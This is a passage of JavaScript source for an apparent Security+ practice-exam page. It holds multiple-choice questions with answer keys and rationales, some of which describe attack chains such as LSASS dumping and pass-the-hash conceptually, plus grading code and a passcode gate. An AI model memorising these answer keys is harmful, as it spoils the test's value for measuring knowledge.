q:"A red team uses Cobalt Strike to establish a foothold, dump LSASS memory to extract credentials, then uses pass-the-hash to authenticate to other servers without knowing the plaintext passwords. Which Microsoft mitigation is MOST EFFECTIVE against this attack chain?",
options:["Stronger passwords for all users","Credential Guard (virtualization-based protection of LSASS) plus disabling NTLM where possible","Antivirus","Daily backups"],
correct:1,
rationale:"Pass-the-hash works because NTLM authentication proves possession of the NT hash rather than the password: an attacker with local admin on one host can read the hashes LSASS holds for logged-on users and replay them to other hosts. Credential Guard moves the secret-holding part of LSASS into a virtualization-based security enclave (LSAIso), so NT hashes and Kerberos keys cannot be read even with SYSTEM privileges. Disabling or restricting NTLM in favor of Kerberos removes most of the replay surface. Stronger passwords do not help when the hash itself is what is replayed. AV may catch a Cobalt Strike payload but not the technique. Backups are recovery, not prevention. In practice Credential Guard is paired with local admin password randomization (LAPS), the Protected Users group, and tiered administration, because local accounts and already-issued Kerberos tickets sit outside its protection."
},
{
cat:"D4",
q:"PERFORMANCE-BASED: A SOC analyst sees the following sequence in 30 minutes: (a) successful logon from a contractor account, (b) creation of a new local admin account on the contractor's workstation, (c) lateral movement attempt to a domain controller, (d) extraction of NTDS.dit. What is the MOST appropriate containment action ordering?",
options:["(1) Isolate workstation network; (2) Disable contractor account; (3) Force password reset for any high-value accounts that may have been exposed; (4) Begin forensic collection","(1) Restore from backup; (2) Send an email to all employees","(1) Wait and monitor; (2) See if the activity stops","(1) Patch the operating system; (2) Reboot the domain controller"],
correct:0,
rationale:"Containment goal: stop the active attack while preserving evidence. (1) Network isolation cuts the attacker off the workstation without powering it down (preserves RAM for forensics). (2) Disable the contractor account so the attacker cannot reuse it elsewhere. (3) NTDS.dit contains every domain account's password hash, so a confirmed extraction means a domain-wide credential reset: start immediately with privileged and service accounts and plan a double reset of the krbtgt account to invalidate forged Kerberos tickets. (4) Then begin formal forensic collection. The other options either fail to contain (B, C) or address the wrong layer entirely (D)."
},
{
cat:"D4",
q:"A company wants to centralize all security policy configuration (password requirements, MFA enforcement, account lockout, audit logging) across hundreds of Active Directory clients. What technology accomplishes this?",
options:["Local Security Policy on each machine","Group Policy Objects (GPOs) applied at the OU level","Manual hardening scripts run weekly","Per-user registry edits"],
correct:1,
rationale:"Group Policy Objects (GPOs) centrally configure Windows clients and servers in an Active Directory domain. Policies are linked at the Site/Domain/OU level and inherited down the AD tree, allowing fine-grained targeting. Local policy applies to a single machine. Manual scripts don't scale and drift. Per-user registry edits are unmanageable. GPO mastery is foundational for any Windows enterprise security role."
},
{
cat:"D5",
q:"A company identifies a low-likelihood, low-impact risk that would cost more to mitigate than the potential loss. Which risk treatment is MOST appropriate?",
options:["Mitigate","Transfer","Accept","Avoid"],
correct:2,
rationale:"When the cost of mitigation exceeds expected loss, formal risk acceptance is appropriate — documented, approved, and reviewed periodically. Mitigation would be wasteful. Transfer (typically via insurance) also has cost and is unlikely to be cost-effective for a low-impact risk. Avoidance means eliminating the activity that creates the risk, which is extreme for a low-impact item."
},
{
cat:"D5",
q:"A US-based company processes credit card payments for customers and stores customer health data for a wellness program. Which TWO compliance frameworks MUST it satisfy?",
options:["SOX and FERPA","PCI DSS and HIPAA","GDPR and FISMA","GLBA and COPPA"],
correct:1,
rationale:"Processing credit card data triggers PCI DSS. Storing customer health data triggers HIPAA if the company qualifies as a covered entity or business associate. SOX is for publicly traded company financial reporting; FERPA is for educational records. GDPR applies to EU residents' data. FISMA is for federal agencies. GLBA is for financial institutions; COPPA is for children's online data — neither matches."
},
{
cat:"D5",
q:"A company has invested heavily in technical controls but its breach rate has not improved. What additional control is MOST likely to reduce successful phishing attacks?",
options:["Stronger firewall rules","Regular security awareness training combined with phishing simulations","Faster patch deployment","Increased SOC staffing"],
correct:1,
rationale:"Successful phishing attacks bypass technical controls by tricking the human user. The control that addresses the HUMAN attack surface is awareness training reinforced by realistic phishing simulations that teach recognition. Stronger firewall rules and faster patches do not address user behavior. More SOC staff helps detection AFTER an attack succeeds; the question asks about reducing the success rate."
},
{
cat:"D5",
q:"An organization calculates an Annual Loss Expectancy (ALE) of $40,000 for a particular risk. The Single Loss Expectancy (SLE) is $20,000. What is the Annualized Rate of Occurrence (ARO)?",
options:["0.5","1.0","2.0","4.0"],
correct:2,
rationale:"ALE = SLE × ARO, so ARO = ALE ÷ SLE = $40,000 ÷ $20,000 = 2.0 (the loss is expected to occur twice per year on average). Quantitative risk math is heavily tested on SY0-701. Memorize: SLE = Asset Value × Exposure Factor, ALE = SLE × ARO. Understanding the formula lets you back-solve any of the four values."
},
{
cat:"D5",
q:"Which document defines the minimum acceptable performance levels that a service provider commits to deliver to a customer (e.g., 99.9% uptime)?",
options:["NDA","MOU","SLA","BPA"],
correct:2,
rationale:"A Service Level Agreement (SLA) defines specific, measurable performance commitments and the remedies (often credits) if they are missed. An NDA (Non-Disclosure Agreement) protects confidential information. An MOU (Memorandum of Understanding) is a non-binding expression of intent between parties. A BPA (Business Partnership Agreement) outlines roles and responsibilities in a partnership. SLAs are operationally binding and central to vendor risk management."
},
{
cat:"D5",
q:"An organization is choosing between quantitative and qualitative risk analysis for a particular assessment. Which statement BEST captures the trade-off?",
options:["Quantitative is faster and easier; qualitative is more accurate","Quantitative uses numeric values (SLE, ARO, ALE) and is rigorous but data-intensive; qualitative uses ranked categories (high/medium/low) and is faster but less precise","They produce identical results","Qualitative is only used for compliance"],
correct:1,
rationale:"Quantitative risk analysis assigns dollar values and probabilities, producing precise expected-loss figures — useful when data is available and decisions need defensible numbers. Qualitative analysis uses ranked categories, much faster to perform, used when data is sparse or for early triage. Mature programs use both: qualitative to triage, quantitative on the top risks. (A) inverts the trade-off. (C) and (D) are wrong."
},
{
cat:"D5",
q:"A company is onboarding a new third-party vendor that will process customer PII. What is the MOST important security activity to complete BEFORE granting access?",
options:["Pay the vendor","Vendor risk assessment (security questionnaire, SOC 2 review, contractual data-protection terms including breach-notification SLAs)","Schedule a kickoff meeting","Add the vendor's logo to the website"],
correct:1,
rationale:"Third-party risk management requires that vendors handling sensitive data be assessed BEFORE access is granted: security questionnaire (SIG, CAIQ), independent attestation (SOC 2, ISO 27001), contractual terms (DPA, breach-notification SLA, right-to-audit). Many of the largest breaches in the last decade have come through inadequately vetted third parties. (A), (C), (D) are operational steps, not security ones."
},
{
cat:"D5",
q:"An organization classifies data into four levels: Public, Internal, Confidential, Restricted. What is the PRIMARY purpose of data classification?",
options:["To make data look organized","To match the level of protection (encryption, access control, handling) to the sensitivity of the data","To improve database performance","To comply with one specific regulation"],
correct:1,
rationale:"Data classification labels data by sensitivity so the organization can apply proportionate controls — Restricted data requires encryption at rest and in transit plus strict access control; Public data needs only basic integrity protection. Without classification, organizations either over-protect everything (expensive) or under-protect what matters most. Classification underpins DLP, access reviews, retention policy, and most compliance frameworks."
},
{
cat:"D5",
q:"Which document defines what employees may and may not do with the company's IT resources (email, internet, devices)?",
options:["Acceptable Use Policy (AUP)","Privacy Policy","Service Level Agreement","Business Continuity Plan"],
correct:0,
rationale:"An Acceptable Use Policy (AUP) sets the rules of conduct for employees using company IT resources — what is allowed, what is prohibited, consequences of violation. It is foundational for both security and HR enforcement. A Privacy Policy describes how the company handles personal data. An SLA defines service performance commitments. A BCP describes how the business continues operating during disruption."
},
{
cat:"D5",
q:"A regulation requires that EU residents be able to request a copy of all personal data a company holds about them, request correction of inaccurate data, and request deletion under defined conditions. Which regulation is this?",
options:["HIPAA","PCI DSS","GDPR","SOX"],
correct:2,
rationale:"The General Data Protection Regulation (GDPR) grants EU residents rights of access, rectification, erasure ('right to be forgotten'), portability, restriction, and objection — applicable to any organization globally that processes EU residents' personal data. HIPAA covers US health data. PCI DSS covers payment card data. SOX covers US public-company financial reporting. GDPR is the most expansive data-subject-rights regime currently in force globally."
},
{
cat:"D5",
q:"An organization requires that any employee accessing financial systems must take at least two consecutive weeks of vacation each year, during which someone else covers their duties. What control is this, and what fraud is it designed to detect?",
options:["Mandatory vacation — designed to surface ongoing fraud that requires the perpetrator's continuous presence to conceal","Time-off policy — designed to reduce burnout","Performance review — designed to evaluate productivity","Background check — designed to verify identity"],
correct:0,
rationale:"Mandatory vacation is a long-standing financial-industry control: many fraud schemes (Ponzi-style cover-ups, fraudulent loan portfolios, kiting) require the perpetrator's daily presence to hide ongoing manipulation. Forced absence with someone else doing the job often surfaces the discrepancies. It is a detective control, distinct from burnout-reduction policies. Background checks happen at hire; performance reviews evaluate output. The fraud-detection function is the SY0-701 testable point."
},
{
cat:"D5",
q:"An organization implements job rotation: employees in sensitive positions change roles every 2 years. What is the PRIMARY security purpose?",
options:["To make employees better at all jobs","To detect long-running fraud by exposing it to a fresh set of eyes and to reduce single points of knowledge","To save salary costs","To improve morale"],
correct:1,
rationale:"Job rotation is both a detective control (a successor reviewing the predecessor's work often discovers fraud or shortcuts) and a resilience control (no single individual is irreplaceable). It is paired with mandatory vacation and separation of duties as the classic insider-threat triad. Skill cross-training and morale are real secondary benefits but not the security purpose for the SY0-701 exam."
},
{
cat:"D5",
q:"A US federal government agency is required to implement a security program based on NIST SP 800-53 controls and a continuous monitoring program. Which framework or regulation imposes this?",
options:["HIPAA","FISMA / NIST RMF","PCI DSS","Sarbanes-Oxley"],
correct:1,
rationale:"FISMA (Federal Information Security Modernization Act) requires federal agencies and their contractors to implement a security program aligned with the NIST Risk Management Framework (RMF) and NIST SP 800-53 control catalog. HIPAA covers health data. PCI DSS covers payment cards. SOX covers public-company financial reporting. Knowing which regulation drives which framework is testable: SOX → COSO/COBIT, HIPAA → HIPAA Security Rule, FISMA → NIST RMF, PCI → PCI DSS itself."
},
{
cat:"D5",
q:"An organization's risk appetite is defined as low — leadership wants to avoid all but the smallest possible risks. A new business initiative would have high revenue potential but introduces a medium-likelihood, high-impact data-breach risk. What is the MOST appropriate response?",
options:["Proceed without modification — revenue is more important","Decline the initiative or modify its scope until residual risk fits within the stated appetite","Ignore the risk register","Re-classify the risk as low"],
correct:1,
rationale:"Risk appetite is the qualitative statement of how much risk leadership is willing to accept in pursuit of objectives. When an initiative's residual risk exceeds the stated appetite, the correct response is to bring the risk within appetite (additional controls, scope reduction, transfer via insurance) or to decline. Proceeding anyway undermines the governance framework. Re-classifying a real risk as something it is not is the worst possible response — it is risk management theater."
},
{
cat:"D5",
q:"An organization decides to retain cyber insurance to cover potential breach costs (notification, credit monitoring, forensics, legal). Which risk treatment does this represent, and what are its LIMITATIONS?",
options:["Acceptance — insurance does not change risk","Transfer — but insurance does not eliminate the underlying risk, may exclude state-sponsored attacks, and has policy limits; reputation damage is rarely fully insurable","Avoidance — insurance prevents the risk","Mitigation — insurance reduces likelihood"],
correct:1,
rationale:"Insurance transfers (some of) the financial impact of a risk to the insurer. Limitations are significant: most cyber policies carry war or hostile-act exclusions that insurers have invoked against state-sponsored attacks (the NotPetya coverage disputes, Merck v. Ace American and Mondelez v. Zurich, are the reference cases), have policy caps below realistic large-breach costs, may decline coverage if pre-conditions (MFA, EDR, IR plan) were not in place, and rarely compensate for reputation damage or lost business. Insurance does not reduce the underlying probability of a breach; it changes who pays after one."
},
{
cat:"D5",
q:"An organization is preparing for an external audit. What is the PRIMARY difference between an audit and an assessment?",
options:["Audits are conducted internally; assessments externally","An assessment evaluates posture often for the org's own improvement; an audit is typically formal, evidence-driven, conducted against a specific standard, and produces an opinion or attestation","They are the same thing","Audits are voluntary; assessments are mandatory"],
correct:1,
rationale:"An assessment is broader and often diagnostic — it identifies strengths, weaknesses, and recommendations. An audit is more formal, follows a specific standard (SOC 2, ISO 27001, PCI DSS, FedRAMP), requires evidence for every control assertion, and ends with a formal opinion, certification, or attestation that can be shared with customers and regulators. Both can be internal or external. (A) and (D) are not the defining differences."
},
{
cat:"D5",
q:"An organization runs simulated phishing campaigns and tracks who clicks. Repeat clickers receive targeted training. What is this an example of?",
options:["Reactive security only","Continuous security awareness reinforced by behavioral measurement","A penetration test","Compliance audit"],
correct:1,
rationale:"Mature security awareness programs measure behavior (not just attendance at training) by running periodic simulated phishing, tracking who clicks or reports, and routing repeat clickers to targeted reinforcement. This is far more effective than annual computer-based training that everyone clicks through. It is also evidence of an ongoing program — a key audit point under most frameworks."
},
{
cat:"D5",
q:"Which framework is BEST described as a comprehensive set of management, operational, and technical control categories that organizations select from based on a system's impact level (Low, Moderate, High)?",
options:["NIST SP 800-53","PCI DSS","GDPR","HIPAA Security Rule"],
correct:0,
rationale:"NIST SP 800-53 is a catalog of ~1000 security and privacy controls organized into families (Access Control, Audit, Configuration Management, etc.). Federal agencies and many private-sector organizations baseline controls based on FIPS 199 impact level — Low, Moderate, or High — and tailor from there. PCI DSS is the payment card framework. GDPR is the EU data-protection regulation. HIPAA Security Rule is the US health-data framework. 800-53 is the broadest catalog."
},
{
cat:"D5",
q:"A SaaS vendor publishes a SOC 2 Type II report. What does the 'Type II' designation specifically tell a prospective customer?",
options:["Only that the controls were designed adequately at a point in time","That the controls were both designed adequately AND operated effectively over a defined period (typically 6-12 months)","That the vendor is certified by the IRS","That the report is automatically renewed every year"],
correct:1,
rationale:"SOC 2 Type I assesses control DESIGN at a single point in time. SOC 2 Type II assesses both design AND operating effectiveness over a period (commonly 6 or 12 months) — meaning auditors sampled evidence throughout the period to verify controls actually ran as designed. Type II reports are dramatically more valuable for vendor risk assessment because they reflect sustained operation, not a one-time snapshot."
},
{
cat:"D5",
q:"A US-based healthcare provider uses a third-party SaaS vendor to host patient records. Which contractual instrument MUST be in place between the provider and the vendor under HIPAA?",
options:["Service Level Agreement (SLA) only","Business Associate Agreement (BAA)","Non-Disclosure Agreement (NDA) only","Memorandum of Understanding (MOU)"],
correct:1,
rationale:"HIPAA requires that any vendor (Business Associate) that creates, receives, maintains, or transmits PHI on behalf of a Covered Entity sign a Business Associate Agreement (BAA). The BAA contractually extends HIPAA obligations to the vendor, defines breach-notification timing, and limits permitted uses of PHI. An SLA, NDA, or MOU alone does NOT satisfy HIPAA. Operating with PHI without a BAA in place is a per-record violation with potentially massive penalties."
},
{
cat:"D5",
q:"An organization conducts a Business Impact Analysis (BIA). What is the PRIMARY output and how is it used?",
options:["A patch list — used for vulnerability management","A prioritized inventory of business processes with their RTO, RPO, and dependencies — used to design the BCP/DR plan and resource allocation","A budget — used for purchasing","A risk register — used for compliance reporting"],
correct:1,
rationale:"A BIA identifies the critical business processes, the impact of their disruption over time (financial, operational, reputational), the maximum tolerable downtime (MTD) for each process, the recovery time objective (RTO, which must fit inside the MTD) and recovery point objective (RPO, the acceptable data loss), and the dependencies (people, systems, vendors, facilities). This drives BCP/DR design — what to recover first, how fast, and what backup capacity is needed. Without a current BIA, recovery investment is essentially guesswork."
},
{
cat:"D5",
q:"An organization's privacy program implements 'privacy by design' as a core principle. What does this BEST mean in practice?",
options:["Privacy is considered only after a system is built","Privacy considerations (data minimization, default-private settings, transparency, purpose limitation) are built into the system from the earliest design stage and throughout the lifecycle","Privacy means using strong encryption only","Privacy is the marketing team's responsibility"],
correct:1,
rationale:"Privacy by design (Ann Cavoukian's 7 foundational principles, also embedded in GDPR Article 25) means treating privacy as a default architectural property — minimizing data collected, defaulting to the most private settings, building in user transparency, limiting data use to declared purposes, and integrating privacy across the full lifecycle. It is the opposite of bolting privacy on after the system is built. Encryption is one tool; the principle is broader."
},
{
cat:"D5",
q:"Which framework provides 18 prioritized, actionable Critical Security Controls that are often used by small and mid-size organizations as a starting baseline?",
options:["NIST SP 800-53","CIS Controls (formerly SANS Top 20)","ISO 31000","COBIT 2019"],
correct:1,
rationale:"The CIS Controls (currently version 8 with 18 controls, formerly the SANS Top 20) are a prioritized, action-oriented set of practices specifically designed to be implementable by smaller organizations as a starting baseline. NIST SP 800-53 is exhaustive but heavy. ISO 31000 is risk-management focused. COBIT is governance-focused. For an SMB without dedicated security staff, starting with CIS Controls Implementation Group 1 is the most common pragmatic approach."
}
];
// ===== CATEGORY METADATA =====
const CATS = {
D1:{name:"General Security Concepts", short:"General"},
D2:{name:"Threats, Vulnerabilities & Mitigations", short:"Threats"},
D3:{name:"Security Architecture", short:"Architecture"},
D4:{name:"Security Operations", short:"Operations"},
D5:{name:"Security Program Management & Oversight", short:"Program Mgmt"}
};
const CAT_ORDER = ["D1","D2","D3","D4","D5"];
// ===== STATE =====
let answers = {}; // {questionIndex: selectedOptionIndex}
let current = 0;
let timerEnabled = true;
let timeLeft = 150*60; // seconds
let timerInterval = null;
const TOTAL = QUESTIONS.length;
// ===== START SCREEN =====
document.getElementById('fact-count').textContent = TOTAL;
document.getElementById('qtotal').textContent = TOTAL;
document.getElementById('timerToggle').addEventListener('click', function(){
this.classList.toggle('on');
timerEnabled = this.classList.contains('on');
});
function show(id){
document.querySelectorAll('.screen').forEach(s=>s.classList.remove('active'));
document.getElementById(id).classList.add('active');
window.scrollTo(0,0);
}
function startTest(){
answers={}; current=0;
show('screen-quiz');
buildJumpGrid();
renderQuestion();
if(timerEnabled){
document.getElementById('timer').classList.remove('hidden');
timeLeft=150*60;
updateTimerDisplay();
timerInterval=setInterval(tick,1000);
} else {
document.getElementById('timer').classList.add('hidden');
}
}
function tick(){
timeLeft--;
updateTimerDisplay();
if(timeLeft<=0){
clearInterval(timerInterval);
document.getElementById('timer').textContent="Time's up — finish & submit";
}
}
function updateTimerDisplay(){
const m=Math.floor(timeLeft/60), s=timeLeft%60;
const t=document.getElementById('timer');
t.textContent=`${m}:${s.toString().padStart(2,'0')}`;
if(timeLeft<=300) t.classList.add('warn');
}
// ===== RENDER QUESTION =====
function renderQuestion(){
const q=QUESTIONS[current];
document.getElementById('qnum').textContent=current+1;
document.getElementById('qcat').textContent=CATS[q.cat].short;
document.getElementById('qtext').textContent=q.q;
document.getElementById('progbar').style.width=((current+1)/TOTAL*100)+'%';
const letters=['A','B','C','D','E','F'];
let html='';
q.options.forEach((opt,i)=>{
const sel = answers[current]===i ? 'selected':'';
// Choice markup reconstructed (its tags were lost in extraction); the class names are assumed.
// Option text is static author content embedded in this page, not user input, so innerHTML is acceptable here.
html+=`<div class="choice ${sel}" onclick="selectChoice(${i})">
<span class="letter">${letters[i]}</span>
<span class="opt-text">${opt}</span>
</div>`;
});
document.getElementById('choices').innerHTML=html;
document.getElementById('prevBtn').disabled = current===0;
document.getElementById('nextBtn').disabled = current===TOTAL-1;
updateJumpGrid();
}
function selectChoice(i){
answers[current]=i;
renderQuestion();
}
function nextQ(){ if(current<TOTAL-1){current++;renderQuestion();} }
function prevQ(){ if(current>0){current--;renderQuestion();} }
// ===== JUMP GRID =====
function buildJumpGrid(){
let html='';
for(let i=0;i<TOTAL;i++){
// cell markup reconstructed (lost in extraction); the id/class names are assumed
html+=`<div class="jump" id="jump-${i}" onclick="current=${i};renderQuestion()">${i+1}</div>`;
}
document.getElementById('jumpgrid').innerHTML=html;
}
function updateJumpGrid(){
// mark each cell as answered / current so the grid doubles as a progress map
for(let i=0;i<TOTAL;i++){
const cell=document.getElementById('jump-'+i);
if(!cell) continue;
cell.classList.toggle('answered', answers[i]!==undefined);
cell.classList.toggle('current', i===current);
}
}
// ===== SUBMIT =====
function submitTest(){
// function name and unanswered-count logic reconstructed; only the confirm message survived extraction
const unanswered = QUESTIONS.filter((_,i)=>answers[i]===undefined).length;
let msg;
if(unanswered>0){
msg=`You have ${unanswered} unanswered question${unanswered>1?'s':''}. `+
`On the real exam, unanswered questions count as wrong — there's no penalty for guessing, so it's always better to answer. `+
`\n\nSubmit anyway?`;
} else {
msg="Ready to submit and see your diagnostic results?";
}
if(confirm(msg)){ gradeTest(); }
}
// ===== GRADING & DIAGNOSTICS =====
function gradeTest(){
if(timerInterval) clearInterval(timerInterval);
// tally by category
const tally={}; CAT_ORDER.forEach(c=>tally[c]={correct:0,total:0});
let totalCorrect=0;
QUESTIONS.forEach((q,i)=>{
tally[q.cat].total++;
if(answers[i]===q.correct){ tally[q.cat].correct++; totalCorrect++; }
});
const pctOverall = totalCorrect/TOTAL;
// Scaled-style score: map 0-100% onto a 100-200 scale with 150 as the pass line.
// This is an APPROXIMATION for study feedback only: the real SY0-701 is reported on a
// 100-900 scale with 750 passing, so the two numbers are not directly comparable.
const scaled = Math.round(100 + pctOverall*100);
const PASS = 150;
const passed = scaled >= PASS;
// hero
const hero=document.getElementById('resultHero');
hero.className='result-hero '+(passed?'pass':'nopass');
// Calibrated messaging tiers
let verdict, msg;
if(scaled>=180){
verdict='Excellent — Well Above Target';
msg=`You scored well above the ~${PASS} passing target on this practice exam. You're in strong shape — use the review below to lock in any remaining gaps.`;
} else if(scaled>=165){
verdict='On Track to Pass';
msg=`You scored comfortably above the ~${PASS} target on this practice exam. Solid work — keep sharpening your weaker categories below.`;
} else if(scaled>=PASS){
verdict='Just Over the Line';
msg=`You're just at or above the ~${PASS} target — passing, but with little margin. Focus on your weaker categories below to build a safer cushion before test day.`;
} else if(scaled>=140){
verdict='Almost There';
msg=`You're just below the ~${PASS} target. You're close — the category breakdown below shows exactly which areas will get you over the line.`;
} else {
verdict='Keep Studying';
msg=`You're below the ~${PASS} target on this practice exam. Don't be discouraged — the diagnostic below pinpoints exactly where to focus your study time for the biggest gains.`;
}
document.getElementById('verdict').textContent = verdict;
document.getElementById('scoreNum').textContent = scaled;
document.getElementById('passMsg').textContent = msg;
document.getElementById('rawSub').textContent =
`You answered ${totalCorrect} of ${TOTAL} correct (${Math.round(pctOverall*100)}%). `+
`The ${PASS} target is this practice test's own 100-200 scale; the real SY0-701 is scored 100-900 with a passing score of 750.`;
// category bars
let catHtml='';
CAT_ORDER.forEach(c=>{
const t=tally[c];
const pct = t.total? t.correct/t.total : 0;
const pctR=Math.round(pct*100);
let status,sClass,fClass;
if(pct>=0.8){status='Ready';sClass='s-ready';fClass='fill-ready';}
else if(pct>=0.6){status='Close — review recommended';sClass='s-close';fClass='fill-close';}
else{status='Needs major work';sClass='s-work';fClass='fill-work';}
catHtml+=`<div class="cat-row">
<div class="cat-head"><span class="cat-name">${CATS[c].name}</span><span class="cat-status ${sClass}">${status}</span></div>
<div class="cat-bar"><div class="cat-fill ${fClass}" style="width:${pctR}%"></div></div>
<div class="cat-sub">${t.correct} of ${t.total} correct (${pctR}%)</div>
</div>`;
});
// Markup, class names and the 'catBreakdown' container id are reconstructed;
// the original template literals were lost in extraction.
document.getElementById('catBreakdown').innerHTML=catHtml;
// answer review: every question with the correct answer, the test-taker's pick, and the rationale
const letters=['A','B','C','D','E','F'];
let html='';
QUESTIONS.forEach((q,i)=>{
const picked=answers[i];
const ok=picked===q.correct;
const verdictTxt = ok ? 'Correct' : (picked===undefined ? 'Unanswered' : 'Incorrect');
const opts=q.options.map((o,j)=>{
const cls=[j===q.correct?'correct':'', (j===picked&&!ok)?'wrong':''].join(' ').trim();
return `<li class="${cls}">${letters[j]}. ${o}</li>`;
}).join('');
// question data is static author content, not user input, so innerHTML is acceptable here
html+=`<div class="review-q ${ok?'ok':'miss'}">
<div class="review-head">Q${i+1} \u00b7 ${CATS[q.cat].short} \u00b7 ${verdictTxt}</div>
<div class="review-text">${q.q}</div>
<ul class="review-opts">${opts}</ul>
<div class="review-rationale">${q.rationale}</div>
</div>`;
});
document.getElementById('reviewArea').innerHTML=html;
show('screen-results'); // results screen id assumed, following the screen-gate/start/quiz naming
}
function toggleReview(){
const area=document.getElementById('reviewArea');
const btn=document.getElementById('reviewBtn');
// computed style, so a stylesheet-only display:none behaves the same as the inline one set by restart()
if(getComputedStyle(area).display==='none'){
area.style.display='block';
btn.textContent='Hide Answer Review';
area.scrollIntoView({behavior:'smooth'});
} else {
area.style.display='none';
btn.textContent='Review All Answers & Rationales';
}
}
function restart(){
answers={};current=0;timeLeft=150*60;
document.getElementById('timer').classList.remove('warn');
document.getElementById('reviewArea').style.display='none';
document.getElementById('reviewBtn').textContent='Review All Answers & Rationales';
show('screen-start');
}
// =================================================================
// GATE — passcode + name confirmation + Tier 1/2 protections
// =================================================================
const THIS_PRODUCT = 'exam';
const MAX_ACTIVATIONS = 2;
const FULFILLMENT_WORKER_URL = 'https://cipherpathway-fulfillment.drbishopclark20.workers.dev';
// Offline fallback, consulted only when the worker cannot be reached or answers with something
// other than a recognised JSON verdict. Everything in this list ships in page source to every
// visitor, so it must hold preview codes only; it can never be the record of paid entitlements.
const FALLBACK_CODES = [
{code: 'SD-DEMO-2026', name: 'Preview Reader', email: 'preview@cipherpathway.com', expires: '2099-12-31', products: ['manual', 'exam']},
];
// The worker is the real entitlement check (it can also report 'device_limit_exceeded');
// the localStorage device check further down is a second, weaker layer.
async function validateCode(input){
const code = input.trim().toUpperCase();
try {
const resp = await fetch(FULFILLMENT_WORKER_URL + '/validate?code=' + encodeURIComponent(code) + '&product=' + THIS_PRODUCT, {
method: 'GET', mode: 'cors', cache: 'no-store'
});
const data = await resp.json();
if (data.valid) {
const exp = data.expires_at ? new Date(data.expires_at) : null;
const expString = exp ? exp.toISOString().split('T')[0] : 'unknown';
return {ok: true, entry: {code, name: data.name || 'Customer', expires: expString, products: [data.product]}};
}
if (data.reason === 'expired') return {ok: false, reason: 'expired', entry: {code, expires: (data.expired_at||'').split('T')[0]}};
if (data.reason === 'wrong_product') return {ok: false, reason: 'wrong_product'};
if (data.reason === 'device_limit_exceeded') return {ok: false, reason: 'limit_reached'};
} catch (err) {
console.warn('Worker unreachable, falling back to local codes', err);
}
const fallback = FALLBACK_CODES.find(e => e.code === code);
if (!fallback) return {ok: false, reason: 'unknown'};
const today = new Date();
const exp = new Date(fallback.expires);
if (exp < today) return {ok: false, reason: 'expired', entry: fallback};
if (!fallback.products || !fallback.products.includes(THIS_PRODUCT)) {
return {ok: false, reason: 'wrong_product', entry: fallback};
}
return {ok: true, entry: fallback};
}
function deviceFingerprint(){
// Coarse fingerprint: user agent, screen size, timezone, language, platform. Many machines
// collide on these values and all of them are spoofable, so it identifies a browser
// configuration, not a person. Note that screen size is included, so docking a laptop to an
// external monitor or a browser update changes the value and trips the 'different_device' path.
const parts = [navigator.userAgent, screen.width+'x'+screen.height,
new Date().getTimezoneOffset(), navigator.language||'', navigator.platform||''];
// 32-bit h*31+c rolling hash (Java String.hashCode style), forced to int32 each step
let h = 0; const s = parts.join('|');
for (let i = 0; i < s.length; i++){ h = ((h << 5) - h) + s.charCodeAt(i); h |= 0; }
return 'fp_' + Math.abs(h).toString(36);
}
function deviceCheck(code){
// Client-side activation record kept in localStorage, keyed by code. It is a licence
// deterrent, not an enforcement control: clearing site data resets it, and it is not shared
// across browsers. Because the fingerprint and the counter are written together, the counter
// never exceeds 1 within one browser profile; the real 2-device limit is enforced by the worker.
const fp = deviceFingerprint();
const storedFp = localStorage.getItem('sd_fp_' + code);
const storedCount = parseInt(localStorage.getItem('sd_count_' + code) || '0', 10);
if (storedFp && storedFp !== fp) return {ok: false, reason: 'different_device'};
if (!storedFp){
if (storedCount >= MAX_ACTIVATIONS) return {ok: false, reason: 'limit_reached'};
localStorage.setItem('sd_fp_' + code, fp);
localStorage.setItem('sd_count_' + code, (storedCount + 1).toString());
return {ok: true, isFirstUse: true};
}
return {ok: true, isFirstUse: false};
}
function nameMatches(input, expected){
const norm = s => (s||'').toLowerCase().replace(/[^a-z]/g,'');
return norm(input) === norm(expected);
}
const gateInput = document.getElementById('codeInput');
const gateBtn = document.getElementById('gateBtn');
const gateError = document.getElementById('gateError');
const nameStep = document.getElementById('nameStep');
const nameInput = document.getElementById('nameInput');
const nameBtn = document.getElementById('nameBtn');
const nameError = document.getElementById('nameError');
let pendingEntry = null;
function showError(msg){
gateError.textContent = msg;
gateError.classList.add('show');
gateInput.focus(); gateInput.select();
}
function enterExam(entry){
// Hide gate, show start screen
document.getElementById('screen-gate').classList.remove('active');
document.getElementById('screen-start').classList.add('active');
// Set watermarks
const wmText = entry.name + ' \u00b7 expires ' + entry.expires;
document.getElementById('examWmQuiz').textContent = wmText;
document.getElementById('examWmResults').textContent = wmText;
}
async function tryEnter(){
gateBtn.disabled = true;
const originalBtnText = gateBtn.textContent;
gateBtn.textContent = 'Verifying…';
let result;
try {
result = await validateCode(gateInput.value);
} finally {
gateBtn.disabled = false;
gateBtn.textContent = originalBtnText;
}
if (!result.ok){
if (result.reason === 'expired')
showError('This access code has expired (' + result.entry.expires + '). Contact support@cipherpathway.com.');
else if (result.reason === 'wrong_product')
showError('This access code grants access to other CipherPathway products, but not the practice exam.');
else if (result.reason === 'limit_reached')
// the worker reported device_limit_exceeded; previously this fell through to 'not recognized'
showError('This access code has reached its 2-device activation limit. Per the CipherPathway license, activations cannot be transferred or reset.');
else
showError('Access code not recognized.');
return;
}
const entry = result.entry;
const dc = deviceCheck(entry.code);
if (!dc.ok){
if (dc.reason === 'different_device')
showError('This access code is already in use on a different device and has reached its activation limit. Per the CipherPathway license, codes cannot be reset across devices. Please continue using your originally activated devices.');
else if (dc.reason === 'limit_reached')
showError('This access code has reached its 2-device activation limit. Per the CipherPathway license, activations cannot be transferred or reset. Please continue using your previously activated devices for the remainder of your access window.');
return;
}
if (dc.isFirstUse){
pendingEntry = entry;
document.getElementById('gate-step1').style.display = 'none';
nameStep.style.display = 'block';
nameInput.focus();
return;
}
enterExam(entry);
}
function tryNameConfirm(){
if (!pendingEntry) return;
if (!nameMatches(nameInput.value, pendingEntry.name)){
nameError.classList.add('show');
nameInput.focus(); nameInput.select();
return;
}
enterExam(pendingEntry);
}
gateBtn.addEventListener('click', tryEnter);
gateInput.addEventListener('keypress', e => { if (e.key === 'Enter') tryEnter(); });
gateInput.addEventListener('input', e => {
let v = e.target.value.toUpperCase().replace(/[^A-Z0-9]/g, '');
if (v.length > 2) v = v.slice(0,2) + '-' + v.slice(2);
if (v.length > 7) v = v.slice(0,7) + '-' + v.slice(7);
if (v.length > 12) v = v.slice(0,12);
e.target.value = v;
gateError.classList.remove('show');
});
nameBtn.addEventListener('click', tryNameConfirm);
